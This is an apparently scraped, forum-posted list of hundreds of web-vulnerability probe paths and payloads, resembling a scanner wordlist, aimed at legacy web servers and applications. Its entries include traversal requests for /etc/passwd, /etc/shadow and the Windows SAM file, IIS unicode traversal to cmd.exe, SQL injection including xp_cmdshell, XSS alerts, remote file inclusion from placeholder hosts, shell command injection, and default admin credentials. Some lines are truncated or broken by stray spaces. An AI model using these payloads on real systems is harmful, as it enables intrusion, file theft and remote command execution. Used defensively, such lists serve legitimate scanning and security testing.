sanal_ceza

/
result_type=topics& hl=&st=20_sql_things/*
MIT%201%20/*
m/search.dll?search?query=/&logic=AND
list/httplist.jse
ilTemplate1=/cgi-bin/formprocessor.asp
hru('/bin/ls')."
ert('XSS')</script>
ern ame+=+USER+--/.html
e_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
docs/CodeBrws.asp
conf,Listen 8000%0A%0DAccessLog "|../../../../../../winnt/system32/cmd.exe /c dir")
cmdshell(" cmd.exe+/c%20dir");--
c/hosts
8443:/plugins/hpjwja/script/devices_update_printer_fw_upload.hts
8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
77&os=notunixornt&per lpath=/usr/bin/perl&mailprog=/bin/sh¬ification="%20.`%2F%75%73%7
10000:/dansguardian/edit.cgi?file=xxx
1%20/*
</script
+FROM+yabbse_members+where+ID_MEMBER= 1/*
:9998/
:9495/
:9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html
:9090/examples/applications/bboard/bboard_frames.html
:9090/board.html
:9090/apps/web/vs_diag.cgi?server=_XSS_
:9090//etc/shadow
:9090///
:9000/cgi-bin/query%3f
:9000/admin/reports/alertlist.mml
:8987/sawmill?rfcf+"/etc/passwd"+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
:8888/surf/scwebusers
:8888/SimpleBar.dll/RunReport
:8888/samples/view- source?filename=anotherone
:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=perceb e&re_password=perc
:8888/cgi-bin/admin/admin
:8888/admin/reports/alertlist.mml
:8888/admin.cgi
:8888/ab2/@Ab2Admin
:8888/
:8500/CFIDE/probe.cfm
:85/waadmin.wa
:8383/cd-cgi/sscd_suncourier.pl
:8383/1111/readmail.cgi?uid=user1&mbx=../test/Main
:8100//WEB-INF/webapp.properties
:8100//WEB-INF/web.xml
:8100//WEB-INF/
:81/cgi-bin/.cobalt/message/message.cgi?info=**********alert%28'XSS'%29% 3B</script>
:81/.cobalt/sysManage/../admin/.htaccess
:8099/users/user_setpassword.asp
:8099/admin/users/users.asp
:8099/admin/tasks.asp
:8099/admin/default.asp
:8089/tools/ftgatedump.fts?command=1
:8089/tools/ftgatedump.fts
:8081/admin/reports/alertlist.mml
:8081/
:8080/web-console/ServerInfo.jsp%00
:8080/web-console/
:8080/tea/dynamic/system/teaservlet/Admin?admin=true
:8080/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
:8080/samples/view- source?filename=anotherone
:8080/index.js%70
:8080/examples/servlet/TroubleShooter
:8080/examples/servlet/SnoopServlet
:8080/examples/servlet/SnoopServlet
:8080/examples/jsp/source.jsp
:8080/examples/jsp/snp/anything.snp
:8080/examples/basic/servlet/HelloServlet
:8080/anything.jsp
:8080/\../readme.txt
:8080//admin//user.pl
:8080/.jsp/WEB-INF/classes/Env.java
:8080/../ssd.ini
:8080/../examples//WEB-INF/../../../../../
:8080/../../winnt/win.ini%00examples/jsp/hello.jsp
:8080/../../../conf/Eserv.ini
:8080/%2e%2e/%2e%2e/%00.jsp
:8025/admin/reports/alertlist.mml
:8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/ac
:8010/Guide/../../../../../../../../../../../../../../../etc/shadow
:8010/d://
:8010/c://
:8010//
:8010/..../
:8010/
:801/../../../../../../../../etc/hosts
:8009/
:8003/Display
:8002/Newuser?Image=../../database/rbsserv.mdb
:8000/servlet/ssifilter/../../test.jsp
:8000/servlet/jsp/../../tst.txt
:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
:8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
:8000/servlet/com.endymion.sake.servlet.mail.MailServlet?
:8000/file/%2E%2E/test1.mp3
:8000/cgi/wja?page=wja
:8000/admin/reports/alertlist.mml
:8000//welcome.jsp
:8000//
:8000/./WEB-INF/web.xml
:8000/./WEB-INF/
:800/C:/
:800/../..\
:80/admin/reports/alertlist.mml
:80/../../../autoexec.bat
:7464/
:7273/?dellopenmanage
:6680/user.cgi?cmd=xssthings&utoken=
:6422/iiwiznew.asp
:6422/iiaction.asp
:6346/........../windows/win.ini
:631/jobs
:631/admin/?op=%c0
:5555/diffs/foo.c@';echo%20>tst'?nav= index.html|src/|hist/foo.c
:5000/diffs/foo.c@';echo%20>tst'?nav=index.html|src/|hist/foo.c
:5000/
:444/splashAdmin.php
:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts
:444/..\..\..\..\..\autoexec.bat
:4274/../../../../../WINNT/repair/sam
:4096/../../../winnt/repair/sam._
:4080/?KerioFW
:32000/mail/readmail.html?folder=inbox&get=1&id=something
:32000/mail/admin/../settings.html.
:32000/mail/admin/../include.html.
:32000/mail/addressaction.html
:3128/status.htm
:3128/mailbox.htm
:3128/../../../conf/Eserv.ini
:3128/../../../../
:30001/SWEditServlet?station_path=Z&publication_id=2043&t emplate=../../../../../../../et
:30001/../../template/shared/indexTemplate.xml
:3000/../../hosts
:2301/Proxy/LoginResponse
:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2F bo ot.ini
:2211/servlet/SessionServlet
:2211/servlet/ServletManager?user=servlet&password=manager
:2211/se/SYS:/novonyx/suitespot/docs/sewse/misc/allfield.jse
:2211/perl/env.pl
:2211/perl/
:2211/nsn/fdir.bas:ShowVulume
:2211/nsn/env.bas
:2211/nsn/Charx230=overflow
:2211/nsn/..%5Cutil/slist.bas
:2211/nsn/..%5Cutil/dsbrowse.bas
:2211/nsn/..%5Cutil/dir.bas
:2211/lcgi/ndsobj.nlm/OP=170xA=overflow
:2211/lcgi/ndsobj.nlm/170xA=overflow
:2211/lcgi/lcgitest.nlm
:2211/examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/console.log
:2200/servlet/SessionServlet
:2200/servlet/ServletManager?user=servlet&password=manager
:2200/se/SYS:/novonyx/suitespot/docs/sewse/misc/allfield.jse
:2200/perl/env.pl
:2200/nsn/fdir.bas:ShowVulume
:2200/nsn/env.bas
:2200/nsn/Charx230=overflow
:2200/nsn/..%5Cutil/slist.bas
:2200/nsn/..%5Cutil/dsbrowse.bas
:2200/nsn/..%5Cutil/dir.bas
:2200/lcgi/ndsobj.nlm/OP=170xA=overflow
:2200/lcgi/ndsobj.nlm/170xA=overflow
:2200/lcgi/lcgitest.nlm
:2200/examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/console.log
:2082/login/?user=_cmd_with_pipes_and_backticks
:2002/..\..\..\..\..\..\temp\temp.class
:1500/CONF&LOG=/etc/hosts&NOIH=no&FRAMES=y
:13333/cgi-bin/forms.exe?extension=foobar&command=Add+Extension
:13333/cgi-bin/forms.exe?command=change_index_mode&mode=config
:1099/reports/superlongstringxxxaso
:10000/servers/link.cgi/1/init/edit_action.cgi?0+../../../../../../../../../etc/hosts
:10000/net/
/zorum/include.php?gorumDir=anotherhost_with_group.php
/zips/
/zipfiles/
/zip/
/zeroboard/_head.php?_zb_path=http://thehost.net/a"
/zentrack/index.php?configFile=/../../../../../etc/hosts
/zboard/mem.php
/zboard/_head.php?_zb_path=http://thehost.net/a"
/yabbse/ssi.php?sourcedir=otherhost_with_Errors_php
/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1_sql_thin gs
/yabbse/Sources/Packages.php?sourcedir=anotherhost_with_Packer.php
/yabbse/Sources/Admin.php
/yabbse/Reminder.php?searchtype=esearch&user=userA'%20or%2 0memberName='userB
/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6 d19f2;action=post;threadid=1;
/yabbse/
/yabb/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2 f%2e%2e%2fetc%2fhosts%00
/yabb/
/xsql/java/xsql/demo/adhocsql/query.xsql?xml-stylesheet=none.xml&sql=select+*+from+sys.db
/xsql/java/demo/
/XMBforum/member.php?action=viewpro&member=admin<script&g t;alert('x')<%2fscript>
/xmbforum/member.php
/XMBforum/buddy.php?action=**********alert('x')</script>&buddy=**********al
/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=% 20f.private=-99%20GROUP%20B
/xmb/member.php?action=viewpro&member=waraxe&restrict=% 20f.private=-99%20GROUP%20BY%20p.
/xmb/member.php
/wx/s.dll?d=/bootlog.txt
/www-sql/
/wwwjoin/
/wwwboard/wwwboard.pl
/wwwboard/wwwadmin.pl
/wwwboard/wwwadmin.cgi
/wwwboard/passwd.txt
/www/
/WS_FTP.LOG
/wordpress/index.php?cat=100)%09or%090=0%09or%09(0=1
/wl_management_internal2/wl_management
/wl_management_internal2/
/wl_management?x=y
/wikihome/action/conflict.php?TemplateDir=http://my.host/
/wi/bin/
/wi/
/WebzEdit/done.jsp?message=');xss_things;a=escape('
/WebTrend/
/webstore/admin/addcustomer.php
/webstore/addcustomer.php
/webstar.log
/WebSTAR%20LOG
/website/
/WebShop/
/webres/discuss/passwd.txt
/webMathematica/MSP?MSPStoreID=../../../../../etc/hosts&MSPStoreType=image/gif
/webmail/vpopmail.php
/webmail/src/search.php
/webmail/src/read_bOdy.php
/webmail/src/compose.php?mailbox="script_stuff
/webmail/message.mdb
/webmacro/Page?db=tst&wmtemplate=ttt
/webmacro/org.paneris.paneris.controller.Page?db=tst&wmtempl ate=ttt
/WEB-INF/web.xml
/WEB-INF./web.xml
/webEdition/
/WebDB/admin_/
/webdata/
/web-console/ServerInfo.jsp%00
/web-console/
/webcalendar/colors.php?color=xssthings
/webcalendar/
/webboard/
/webadmin/
/webadmin.ntf
/webadmin.nsf
/WebAdmin.dll?View=Logon_and_User_POSTVARoverflow
/WebAdmin.dll?Session=X&Program=MDaemon&Directory:N ame=C:\WINNT&File:Name= WIN.INI&View=
/web800fo/
/Web_store/
/web/usermgr/userlist.asp
/web/msgError.asp?Redirect=login.htm&Reason=thingss
/web/
/web.config
/wbboard/reply.php
/way-board/way-board.cgi?db=way-board.cgi%00
/wartung/
/w-agora/index.php
/wagora/index.php
/waadmin.wa
/vpopmail.php
/vpasp/shopsearch.asp
/vpasp/shopdisplayproducts.asp?cat=qwerty'
/viewsource.jsp
/viewpage.php?file=/etc/hosts
/view_source.jsp
/view_all_bug_page.php
/view.tmpl?testfile=filewithdirtrav
/vgn/vr/Select
/vgn/vr/Editing
/vgn/style
/vgn/ppstats
/vgn/login?errInfo="%2b%20****************%20%2b"
/vgn/legacy/save?needs_vgn_creds_Cookie
/vgn/legacy/edit
/vgn/ac/index
/vgn/ac/edit
/vbzoom/register.php
/VBZooM/download/
/VBZooM/add-subject.php?Success=1&FileName=localFile&FileName_ size=500&FileName_name=rem
/vbb/calendar.php?s=&action=edit&eventid=14_sql_injecti on_things
/variables.php3?Include= [Linkleri ve resimleri görmek için üye olmalısınız ÜYELİK İÇİN TIKLAYIN]
/users/user_setpassword.asp
/Users/default.users
/users/
/users.php?DATA=phpcode&then->/news.php3
/users.asp,
/userinfo.php?uid=33;
/userdata/
/user_update.php
/user_settings.cfg
/user_info.php3?user_username=''+or+admin_level=2+o r+username%3d'x'+and+users.id= access
/user/test.txt
/user/admin.txt
/user/
/user.php?caselist[mungo.txt][path]=http://www.somehost.cc&command=/bin/ls
/usage/
/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
/upnp/service/WANPPPConnection
/upload-tmp/
/uploadtmp/
/upload-temp/
/uploadtemp/
/uploads/
/uploading/
/upload-files/
/uploadfiles/
/uploader.php
/upload-********s/
/upload-docs/
/upload2.html
/upload2.htm
/upload/uploader.php
/upload/upload.php
/upload/
/upload.php
/upload.html
/upload.asp
/updates/
/update.dpgs
/unix/ALEX/Xerver2.10/
/udataobj/webgui/cgi-bin/tuxadm.exe?INIFILE=xssthings
/ubb/register.php
/ubb/cgi-bin/postings.cgi
/typo3/quickstart/
/typo3/install/
/typo3/dev/translations.php
/typo3/
/tutos/file/file_select.php?msg=xss_code
/tutos/file/file_new.php?link_id=1065&fileupload_possible_file _in_tutos_repository_numbe
/ttforum/index.php?action=news;board=1;template=another_ser ver;ext=help
/tstsite/
/tstfiles/
/tst/psoft.hsphere.CP/tst/?template_name=x
/tst/
/tree/
/trace.axd
/TopSitesdirectory/help.php?sid=xssthings
/topsitesdirectory/edit.php?a=pre&submit=&sid=sql_injection--
/topsitesdir/edit.php?a=pre&submit=&auth=1&sid=someid
/topo/out.php?id=any_word
/topo/in.php?id=any_word
/topic/entete.php?subpath=http://badurl_banniere.php
/top/out.php?id=any_word
/top/in.php?id=any_word
/tools/ftgatedump.fts?command=1
/tools/ftgatedump.fts
/tools/
/tmp-upload/
/tmpupload/
/tmpfiles/
/tmp_view.php?file=/etc/hosts
/tmp/
/tinymsg.php?action=2&to=../../tadaam.html%00&from=youpi1&msg=youpi2
/timeline.php?pids=_sql_things
/timeline.php?pids[0]=
/ticketlogin
/ticket.php?id=545
/thread/search.asp
/thread/default.asp?orderby=Author
/thatfile.php?root_path=http://host/config.php_and_messages.1.php
/textportal/admin_pass.php
/texis.exe/?-version
/texis.exe/?-dump
/testsite/
/testfiles/
/test-cgi/
/Test11.asp
/test/
/test.php3
/test.jsp../
/test.jsp..
/test%2ejsp
/temp-upload/
/tempupload/
/templates/head.php?APB_SETTINGS%5Btemplate_path%5D=another_h ost
/templates/form_header.php?noticemsg=jsinject
/tempfiles/
/temp/
/technote/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/sysuser/docmgr/ieedit.stm?url=%2e%2e%2f
/sysuser/docmgr/iecreate.stm?template=%2e%2e%2f
/system/bin/user/p0184.php
/system/bin/user/p0177.php
/system/bin/upload/p0227.php
/system/bin/upload/p0204.php
/system/bin/upload/p0199.php
/system/bin/upload/
/system/bin/page/p0190.php
/system/bin/binbackoffice/p0104.php
/system/bin/binbackoffice/
/system/bin/
/system/
/syslog.htm
/sws/admin.html
/SWEditServlet?station_path=Z&publication_id=2043&t emplate=../../../../../../../etc/host
/supporter/tupdate.php?groupid=change&sg=groupid,description= char(97,98,99,100)&id=10
/supporter/index.php?t=updateticketlog&id=without%20me
/supporter/index.php?t=editticket&id=got%20root
/supporter/index.php?t=detailticket&id=root%20me
/support/messages
/support/
/suche%3f
/subscribe.pl
/submit.php
/stronghold-status
/stronghold-info
/StoreDB/
/store/tmp/
/store/temp_customers/
/store/temp/
/store/stats.php
/store/show_cart.inc.php
/store/shopexd.asp?catalogid=sql_inject
/store/sfError.asp?sfid=20212&reason=xssscripts
/store/more.php?id='sql_things
/store/index.php?cat_id='
/store/customers/
/status/
/stats/
/stats.php
/statref.nsf
/staticpages/index.php?page=test'test/sqlinject
/stat/
/ssi/envout.bat
/ssi.php?a=out&type=xml&f=0)
/ss_admin.asp?Mode=Update&Acton=Access&UserName=pom mes&Password=frittes
/srcfiles/
/src/search.php
/src/read_bOdy.php?mailbox=scripting
/src/read_bOdy.php
/src/Profile.php
/src/options.php
/src/left_main.php
/src/
/squirrelmail/src/compose.php?mailbox="script_stuff
/sql/db_type.php?waroot=http://anotherhost_start_php/
/sql/
/SPSamp/AdvWorks/equipment/catalog_type.asp
/sources/functions.php?skinid=huhh
/source?v=../../../../../../../etc/hosts%00
/source/
/source.jsp
/soinfo.php
/software/
/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
/soap/servlet/Spy
/soap/servlet/soaprouter
/snmpinit
/siteserver/publishing/viewcode.asp?source=/tata.asp
/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
/SiteServer/Admin/knowledge/dsmgr/default.asp
/SiteServer/admin/findvserver.asp?uid=LDAP_Anonymous&pwd=LdapPasswor d_1
/SiteServer/Admin/commerce/foundation/DSN.asp
/SiteServer/Admin/commerce/foundation/driver.asp
/SiteServer/Admin/commerce/foundation/domain.asp
/sitenews.cgi?edit
/siteman000510/siteman.php3
/site/page.html
/site/iissamples/
/site/eg/source.asp
/site/'+UNION+ALL+SELECT+FileToClob('/etc/hosts','server')::html,0+FROM+sysusers+WHERE+us
/sipssys/users/
/sips/sipssys/users/
/sips/htdocs/preferences.php
/sips/htdocs/admin/index.php
/singapore/data/adminusers.csv
/simplebbs/users/users.php
/signon?admin=admin&maybe_tivoli
/shtml/
/showhits.php3?rel_path=http://another/main_********.inc
/showcat.asp/
/show_cart.inc.php
/shoutbox.php?conf=../../../../../../../etc/hosts
/shopping/shopexd.asp?catalogid=sql_inject
/shopping/shopexd.asp
/shopping/shopdisplayproducts.asp?id=1&cat=xss_things
/shopper/
/shopper.exe?display=action&template= order.log
/shopexd.asp?catalogid=sql_inject
/shopexd.asp
/shop/users.asp,
/shop/stats.php
/shop/showcat.asp/
/shop/show_cart.inc.php
/shop/shopexd.asp?catalogid=sql_inject
/shop/shopexd.asp
/shop/payonline.asp
/shop/normal_html.cgi?file=|id|
/shop/normal_html.cgi?file=../../../../../../etc/hosts%00
/shop/newuser.asp
/shop/more.php?id='sql_things
/shop/member_html.cgi
/shop/gotopage.cgi?13686+/../../../../../../etc/hosts
/shop/genindexpage.cgi?13687+Home+/../../../../../../etc/hosts
/shop/details.asp
/shop/category.asp?catcode=1%20union%20all%20select%20pa ss,0,0,0,0%20from%20customers%20
/shop/cart.asp
/shop/browse.asp
/shop/
/setupweb.nsf
/setup-files/
/setup_files/
/setup/index.php?GALLERY_BASEDIR=another_host_with_util.p hp
/setup/
/setup.nsf
/setup.cgi?todo=debug
/settings/site.ini
/settings
/sessions.py
/sessions.pl
/sessions.phps
/sessions.php
/sessions.jsp
/sessions.jhtml
/sessions.aspx
/sessions.asp
/sessions
/session/pagecount?page=
/session/adminlogin?RCpage=/sysadmin/index.stm
/session/
/session.py
/session.pl
/session.phps
/session.php
/session.jsp
/session.jhtml
/session.aspx
/session.asp
/servlets/wl_management
/servlets/weblogic.management.servlet.FileDistributionServle t
/servlets/org.apache.cocoon.Cocoon
/servlets/gnujsp//
/servlets/com.sun.server.http.pagecompile.jsp92.JspServlet
/servlets/com.sun.server.http.pagecompile.jsp.runtime.JspSer vlet
/servlet/wl_management
/servlet/WebPopServlet?config=uii.txt
/servlet/webacc?User.id=&User.password=&User.context=cwqlNo moqdOq&User.interface=frames&
/servlet/webacc?User.html=../../../../../../../../boot.ini%00
/servlet/viewsource.jsp
/servlet/test/pathInfo/test
/servlet/SurveyXMLServlet?jeaaa.txt
/servlet/ssifilter/../../test.jsp
/servlet/Spy
/servlet/SessionServlet
/servlet/ServletManager?username=servlet&password=manager
/servlet/psoft.hsphere.CP/
/servlet/psoft.hsphere.CP
/servlet/psft.pt8.reader.ReaderServlet
/servlet/psft.pt8.gateway.GatewayServlet
/servlet/psft.pt8.config.ConfigServlet
/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
/servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
/servlet/jsp/../../tst.txt
/servlet/FormMailServlet?juhu.txt
/servlet/FileDistributionServlet
/servlet/file
/servlet/DMSDump
/servlet/ContentServer?pagename=xssthings
/servlet/com.unify.ewave.servletexec.UploadServlet
/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet
/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspSer vlet
/servlet/com.newatlanta.servletexec.JSPServlet/
/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5c\global.asa
/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
/servlet/com.endymion.sake.servlet.mail.MailServlet?
/servlet//..//../o.jsp
/sendphoto.php?album=..&pic=config.inc.php&sendto=m ei@websec.org&filled=1
/sendphoto.php?album=..&pic=config.inc.php
/sendeditfile
/sek-bin/login.gas.bat?Template=../../../../../../../../etc/hosts&LOCALE=en_US&AUTHMETHOD
/sek-bin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale =../../config/log.conf%00%5c&
/Secure/Local/console/cmhome.htm
/secure%5Clogin.aspx
/secret/index.html
/secret/index.htm
/search97/search97.vts
/search97/s97_cgi.exe
/search?NS-query=tst&NS-query-pat=..\..\..\..\..\boot.ini
/search/search97.vts?HLNavigate=On&querytext=dcm&ServerKey =Primary&ResultTemplate=../../
/search/s97_cgi.exe
/search/s97.vts?Action=FormGen&ServerKey=Primary&Template=
/search/results.stm?query=**********alert('X');</script>
/search/results.stm
/search/iaquery.exe%3f
/search.php?search=a'%20order%20by%20time%20desc% 3b%20qry
/search.php?search=a%'%20order%20by%20time%20de sc%3b%20qry
/search.dll?search?query=%00&logic=AND
/search.asp
/search%3f
/Search
/scrivi.php
/scripts/wwwi32.exe/[in=c:\\boot.ini]
/scripts/wsm.phtml?searchboxinputname=|unixcommand
/scripts/wsisa.dll/WService=anything?WSMadmin
/scripts/wsendmail.exe
/scripts/wguest.exe
/scripts/websec.bat/ ..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir%20C:\
/scripts/webplus.exe
/scripts/webnews.exe
/scripts/uploadx.asp
/scripts/uploadn.asp
/scripts/upload.exe
/scripts/upload.asp
/scripts/toos/mkilog.exe
/scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B %28*.mdb%29&dsn=Web%20S
/scripts/tools/getdrvrs.exe
/scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=ngt(ng% 20int);EXEC+master..xp_
/scripts/texis.exe/ngohos
/scripts/texis.exe/?-version
/scripts/texis.exe/?-dump
/scripts/test.exe
/scripts/test.bat
/scripts/slxweb.dll/getfile?type=Library&file=_any_file_tata
/scripts/slxweb.dll/admin
/Scripts/SLwebmail/WebMailReq.dll?pathdisclosure
/Scripts/SLwebmail/showlogin.dll?Language=BOF
/Scripts/SLwebmail/ShowGodLog.dll?FILE=c:%5c%5cBOOT.INI
/Scripts/SLwebmail/recman.dll?CompanyID=BOF
/Scripts/SLwebmail/GlobalLogin.dll?CompanyID=BOF
/Scripts/SLwebmail/GlobalLogin.dll?CompanyID=BOF
/Scripts/SLwebmail/admin.dll?CompanyID=BOF
/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&fil e= ;ls|
/scripts/search.asp
/scripts/script.cmd%3f&dir
/scripts/script.bat%3f&dir
/scripts/samples/details.idc
/scripts/samples/ctguestb.idc
/scripts/rguest.exe
/scripts/repost.asp
/scripts/process_bug.cgi
/scripts/postie.exe
/scripts/postie.cgi
/scripts/perl.exe
/scripts/perl
/scripts/objcheck.asp
/scripts/nsiislog.dll?
/scripts/mailsend.exe
/scripts/MailPost.exe
/scripts/mailmepro.exe
/scripts/mailme.exe
/scripts/mailform.exe
/scripts/mail.cgi
/scripts/iisadmin/ism.dll%3fhttp/dir
/scripts/gnujsp//
/scripts/formvar.exe
/scripts/foo.cmd?xxx&dir
/scripts/files.pl
/scripts/emurl/RECMAN.dll?
/scripts/dbman/db.cgi?db=tedb
/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
/scripts/CWMail.exe
/scripts/cs/cssearch.cgi?command=all&setup=`/bin/ls`
/scripts/cpshost.dll?my_file=localthing&TargetURL=/Sites/Publishing/srvname/ldap_anonymou
/scripts/cphost.dll?my_file=localthing&TargetURL=/Sites/Publishing/srvname/ldap_anonymous
/scripts/convert.bas
/scripts/cgimail.exe
/scripts/cgi-bin/upload.exe
/scripts/cart32.exe/GetLatestBuilds?cart32=xssthings
/scripts/cart32.exe/cart32clientlist?passwd=wemilo
/scripts/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:\..\winnt\sy stem32\cmd.exe%20/c%2
/scripts/Carello/Carello.dll?CARELLOCODE=postthing&VBEXE=thisisit
/scripts/Carello/Carello.dll
/scripts/Carello/add.exe
/scripts/c32web.exe/ChangeAdminPassword
/scripts/blat.exe
/scripts/bigconf.cgi
/scripts/bdir.htr
/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/*.pl
/scripts
/scozbook/view.php?PG=notexisting
/scozbook/add.php
/sbin/nscgi.cfg
/sbin/
/samples/view- source?filename=anotherone
/samples/Search/queryhit.htm
/sales/
/s97is.vts?action=View&VdkVgwKey=%2Fetc%2fhosts&doc type=raw&Collection=
/s8forumfolder/users/any_name.php?cmd=uname%20-a_mail_cmd_etc
/runfile
/run/forma
/run.cgi
/Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/rpc.cgi
/root/
/room/save_item.php?name=wollo&ref=josef&photo=../inc/conf.php&photo_type=txt
/room/index.php?show=search&search=it_name&item=wollo
/robots.txt
/ROADS/cgi-bin/search.pl?form=search.pl%00
/retail/
/resend.asp?ID=sql_things
/reseller/
/reports/temp/
/remote_login.pl%20
/registry/AWSguest.php
/registered/
/register/
/rbdforum-standalone/login.asp
/rbdforum/login.asp
/random_banner/index.cgi?image_list=alternative_image.list&html_f ile=|ls%20-la|
/random_banner/index.cgi?image_list=alternative_image.list&html_f ile=../../../../../etc/
/quote.html?filename=../../../../../../../../../../../../../../../../etc/hosts&path_to_fo
/quikstore.cgi?category=blah&template=../../../../../../../../../../../../etc/hosts
/quikstore.cfg
/quickstart/util/srcview.aspx?path=./&file=srcview.aspx&font=3
/quickstart/
/question/crm/download.php?filename=../../../../../../../../../../../../etc/hosts
/qshop/admin/upload.htm
/qshop/admin/
/pw/storemgr.pw
/pw/
/pvote/ch_info.php
/purchases/
/purchase/
/publisher/
/public/exec/MsmSetup.exe?tst
/public/
/pub/
/ptsite/news.inc
/psynch/nph-psf.exe?lang=
/psynch/nph-psf.exe?css=">_some_XSS
/psynch/nph-psa.exe?lang=
/psynch/nph-psa.exe?css=site_with_file
/psynch/nph-psa.exe?css=">_some_XSS
/psynch/nph- psf.exe?css=site_with_file
/PSUser/PSCOErrPage.htm?errPagePath=/etc/hosts
/pservlet.html
/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20' '='
/proplus/admin/login.php?action=insert&username=test&password=tes t
/prometheus-all/index.php?PROMETHEUS_LIBRARY_BASE= [Linkleri ve resimleri görmek için üye olmalısınız ÜYELİK İÇİN TIKLAYIN]
/Program%20Files/BadBlue/PE/ext.ini
/profiles.php?uid=scriptthings
/profile.php?mode=viewprofile&u='sql_injection
/profile.php
/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/
/ProductCart/pc/msg.asp?message=xssthings
/productcart/pc/Custvb.asp?redirectUrl=&Email='+having+1%3D1--&_email=email&password=asd&
/produccart/pcadmin/login.asp?idadmin='+or+1=1--+
/privmsg.php
/private/
/priv/
/ppwb/Temp/
/powerslave,id,10;,nodeid,,_language,uk.html
/postgresql/
/postgres/
/poster/mem.php
/postbug.php
/post_message_form.asp?mode=quote&PID=1111&FID=1&TI D=11&TPN=1
/portal/diag/
/portal/administration/userman.php
/PoolMan.jsp
/poll/textfile/info.php
/poll/db/info.php
/pm/lib.inc.php?pm_path=anothewrhost_with_config.txt&s fx=.txt
/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%20hello&sqspell_us
/plugins/hpjwja/script/devices_update_printer_fw_upload.hts
/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
/plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.
/plugins/3fax/1blocklists/index.php?plugin=anotherserver_with_things
/plugins/2administration/6departamentadmin/index.php
/plugins/2administration/5terminals/index.php
/plugins/2administration/4mailinglists/index.php
/plugins/2administration/3departaments/index.php
/plugins/2administration/2groupd/index.php
/pls/orasso/orasso.wwsso_app_admin.ls_login
/pls/orasso/
/pls/demo/owa_util.signature
/pls/demo/owa_util.showsource?cname=owa_util
/pls/demo/owa_util.show_query_columns?ctable=sys.dba_users
/pls/demo/owa_util.listprint?p_theQuery=select+*+from+sys.db a_users&p_cname=&p_nsize=
/pls/demo/owa_util.cellsprint?p_theQuery=select+*+from+sys.d ba_users&p_max_rows=10
/pls/demo/%20owa_util.signature
/pls/demo/%0aowa_util.signature
/pls/demo/%08owa_util.signature
/pls/admin_/help/..%5Cplsql.conf
/pls/admin_/?
/placelist.php?level=2&parent[0]=&parent[1]=_sql_things
/placelist.php?level=1_sql_things
/placelist.php?level=1&parent[Blah]=
/placelist.php?level=1&parent[0]=_sql_things
/piranha/secure/passwd.php3?username=piranha&passwd=q
/ping
/pi_admin.admin
/phpwebfilemgr/index.php?f=../../../
/phptonuke.php?filnavn=/etc/hosts
/phprocketaddin/?page=../../../../../../../etc/hosts
/phprank/update.php?page=update&name=zok&description=zok&si teurl=zok&banurl=zok&bh=42&bw
/phpprojekt/
/phpping/index.php?pingto=www.somewhere.org%20|%20dir
/php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21
/phpPhotoAlbum/getalbum.php?album=../../../etc/
